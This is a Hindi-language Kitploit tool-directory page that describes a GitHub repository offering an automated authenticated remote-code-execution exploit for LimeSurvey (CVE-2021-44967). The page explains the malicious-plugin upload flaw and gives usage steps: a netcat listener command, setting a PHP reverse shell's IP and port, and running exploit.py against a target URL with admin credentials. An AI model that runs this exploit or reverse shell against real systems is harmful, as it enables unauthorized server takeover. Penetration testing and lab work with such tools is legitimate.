Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/kikechans/-limesurvey-rce-cve-2021-44967
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubkikechans/-limesurvey-rce-cve-2021-44967

-Limesurvey-RCE-CVE-2021-44967

🔥 Limesurvey के लिए स्वचालित RCE एक्सप्लॉइट (CVE-2021-44967)। विशेषाधिकार वृद्धि के लिए अनुकूलित एक्सप्लॉइट श्रृंखला। 🚀

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
2 महीने पहलेअभी तक समीक्षित नहीं

🚀 LimeSurvey RCE (CVE-2021-44967) - प्रमाणित दूरस्थ कोड निष्पादन

इस रिपॉजिटरी में LimeSurvey में CVE-2021-44967 के लिए एक कार्यात्मक शोषण शामिल है, जो एक प्रमाणित दूरस्थ कोड निष्पादन भेद्यता है।

🎯 अनुकूलता

परीक्षणित और कार्यशील पुष्टि:

  • LimeSurvey 5.2.x
  • LimeSurvey 6.x

🐛 भेद्यता अवलोकन

यह भेद्यता प्रशासनिक विशेषाधिकारों वाले प्रमाणित उपयोगकर्ता को एक दुर्भावनापूर्ण प्लगइन अपलोड करने की अनुमति देती है। चूंकि LimeSurvey प्लगइन ZIP की सामग्री को सख्ती से मान्य नहीं करता है या प्लगइन निर्देशिका में PHP फ़ाइलों के निष्पादन को रोकता नहीं है, एक हमलावर अपलोड किए गए शेल तक सीधे पहुँच कर RCE प्राप्त कर सकता है।

✨ विशेषताएँ

  • 🤖 स्वचालित शोषण: लॉग इन करता है, CSRF टोकन संभालता है, प्लगइन को स्वचालित रूप से अपलोड, इंस्टॉल और सक्रिय करता है।
  • ✅ बेहतर अनुकूलता: LimeSurvey संस्करण 3.0 से 6.0 तक के साथ अनुकूलता के लिए config.xml अपडेट किया गया।
  • 💣 लचीले पेलोड: एक मजबूत PHP रिवर्स शेल शामिल है।

🛠️ उपयोग

1️⃣ अपना लिसनर तैयार करें

अपनी मशीन पर netcat लिसनर प्रारंभ करें:

root@kitploit:~
nc -lvnp 443

2️⃣ रिवर्स शेल कॉन्फ़िगर करें

php-rev.php को संपादित करें और अपना स्थानीय IP और पोर्ट सेट करें:

root@kitploit:~
$ip = '<YOUR_IP>';
$port = 443;

3️⃣ शोषण चलाएँ

root@kitploit:~
python3 exploit.py <TARGET_URL> <USERNAME> <PASSWORD>

उदाहरण:

root@kitploit:~
python3 exploit.py http://10.129.1.243/survey admin test

📁 रिपॉजिटरी संरचना

  • 🐍 exploit.py: मुख्य स्वचालन स्क्रिप्ट।
  • 🐘 php-rev.php: PHP रिवर्स शेल पेलोड।
  • ⚙️ config.xml: अनिवार्य LimeSurvey प्लगइन कॉन्फ़िगरेशन फ़ाइल।

⚠️ अस्वीकरण

यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है। इसे केवल नियंत्रित, कानूनी वातावरण (जैसे CTFs, प्रयोगशाला वातावरण, या अधिकृत संलग्नताओं) में उपयोग के लिए सख्ती से इरादा है। लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है। इसका जिम्मेदारी से उपयोग करें और केवल उन प्रणालियों पर जिनका परीक्षण करने के लिए आपके पास स्पष्ट अनुमति है।

टूल डाउनलोड करें